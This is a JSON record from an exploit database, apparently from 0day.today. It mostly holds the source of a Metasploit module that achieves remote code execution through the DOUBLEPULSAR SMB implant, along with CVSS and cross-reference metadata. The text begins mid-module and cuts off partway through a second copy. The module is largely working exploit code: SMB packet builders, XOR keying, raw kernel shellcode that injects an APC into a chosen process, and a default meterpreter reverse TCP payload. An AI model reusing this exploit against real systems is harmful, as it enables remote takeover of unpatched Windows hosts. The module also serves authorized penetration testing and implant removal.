pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-24T00:15:39", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "6d826972683f0678fb3fe5e6022cbd18", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-25T00:20:17", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-25T00:20:17", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-25T00:20:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n 